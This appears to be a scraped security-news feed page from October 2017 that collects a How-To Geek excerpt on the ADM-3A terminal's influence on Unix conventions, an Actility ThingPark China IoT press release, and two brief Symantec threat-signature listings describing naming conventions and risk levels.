That’s right: a specific keyboard from over forty years ago is why Linux and UNIX-based systems use ~ to represent home, even though the ~ and Home keys couldn’t be further apart on most modern keyboards. Weird, right?

And there are other details hidden in this keyboard. See the arrows on the H, J, K, and L keys? Holding Control and pressing those keys generated the ASCII control characters (backspace, line feed, vertical tab and form feed) that the ADM-3A interpreted as cursor left, down, up and right, which is why those same keys are used to move the cursor in vi. Those vi keyboard shortcuts, in turn, inspired the keyboard shortcuts in Gmail, Twitter and even Facebook. That’s right: even Facebook’s keyboard shortcuts were inspired by a “dumb terminal” first sold in 1975.

Look some more and you’ll notice a few keys you don’t recognize at all. There’s the “Here Is” key, which blogger Dave Cheney explains here. Basically, it sent a fixed, pre-configured identification (“answerback”) string to the remote computer — a way of telling the host which terminal was talking to it, not an authentication mechanism in any security sense. You’ll also see that the Escape key is placed where Caps Lock is on modern keyboards, which kind of puts the MacBook Touch Bar Escape key controversy in a new light. I’m sure there are many other details I’m missing.

A device you’ve never heard of influenced design decisions used in software people still use over forty years later. Isn’t history weird?

Image Credits: Chris Jacobs, StuartBrady, Eric Fischer

Security News

via How-To Geek http://ift.tt/2f5IBTe

October 17, 2017 at 01:18PM

Actility accelerating the Internet of Things in China – IoT Business News (press release) (blog)


http://ift.tt/2x1Wmel

Actility accelerating the Internet of Things in China

ThingPark China Market will give Chinese IoT solution sellers access to both Chinese B2B customers and the global ThingPark Market audience.

ThingPark China, a leading LPWA IoT platform and solutions development provider, announced today the opening of an IoT Ecosystem Lab in Beijing enabling device makers, application providers and customers to connect, test and evaluate their IoT solutions with its localized ThingPark LoRaWAN SaaS platform.

ThingPark China is also opening its online Marketplace to IoT devices and solutions providers in China. ThingPark China Market will enable Chinese IoT devices and application sellers to accelerate the monetization of their IoT solutions with business customers in China, and also to benefit from the global audience and IoT sales opportunities enabled by Actility’s ThingPark Market.

Bing Liu, CEO of ThingPark China said:

“Our Ecosystem Lab and Marketplace will help accelerate the growth of LoRaWAN-based IoT in China by supporting the local ecosystem at every stage from developing and testing their products to distributing solutions to local customers and taking them to market worldwide. We’re bringing the tried and tested solutions from Actility and adapting them to the needs of the local market.”

Chinese device makers and application developers will be able to create a free account on the ThingPark China developer SaaS platform, hosted in China, giving them access to LoRaWAN connectivity and a suite of tools and APIs, including a self-test capability, to support the integration of their solution with ThingPark. A dedicated Ecosystem Lab facility in Beijing will provide a location with LoRaWAN coverage. Within the facility, developers will be able to use the self-testing tools for devices using the Chinese LoRaWAN frequency bands, and also prepare for international distribution by testing against European, APAC and US channel plans.

For customers who prefer to develop and test in their own location, ThingPark China will offer a Developer Kit and gateway pre-configured to connect remotely to the ThingPark China developer platform.

Along with support for developers to create their products, the opening of the ThingPark China Market will provide the opportunity for them to sell local-market IoT products to business customers in China with a user experience optimized for Chinese buyers, and also to sign up to the international ThingPark Market, through which they can sell IoT devices and solutions for any region to customers around the globe, who will be able to buy them in almost 30 different local currencies.

“Here at the LoRa Alliance All-Members Meeting, we can see how quickly the interest and commitment to LoRaWAN is growing in China,” says Bing Liu, “and we’d like to extend an invitation to any company that is interested in adopting, developing and marketing LoRaWAN products globally to join our ecosystem, make use of our lab facilities, developer kits or online tools and sign up for our Market to accelerate their progress in bringing their solution to this dynamic and fast-growing market.”

Security News,IoT News

via IoT – Google News http://ift.tt/2pYPKZV

October 17, 2017 at 01:15PM

Exp.CVE-2017-11292


http://ift.tt/2kUdDVm

Risk level (Risikostufe): Very low. Type: Trojan. The “Exp.” prefix is Symantec’s naming convention for a signature that detects attempts to exploit the named vulnerability, here CVE-2017-11292 (the Adobe Flash Player vulnerability patched in October 2017), rather than a specific malware family.

Security News

via Bedrohungen RSS Feed – Symantec Corporation http://ift.tt/2wNeX07

October 17, 2017 at 01:06PM

JS.Downloader!gen27


http://ift.tt/2yrKTWY

Risk level (Risikostufe): Very low. Type: Trojan. The “!gen” suffix denotes a generic/heuristic Symantec signature, so this detection covers a class of JavaScript downloaders rather than a single sample.

Security News

via Bedrohungen RSS Feed – Symantec Corporation http://ift.tt/2wNeX07

October 17, 2017 at 01:06PM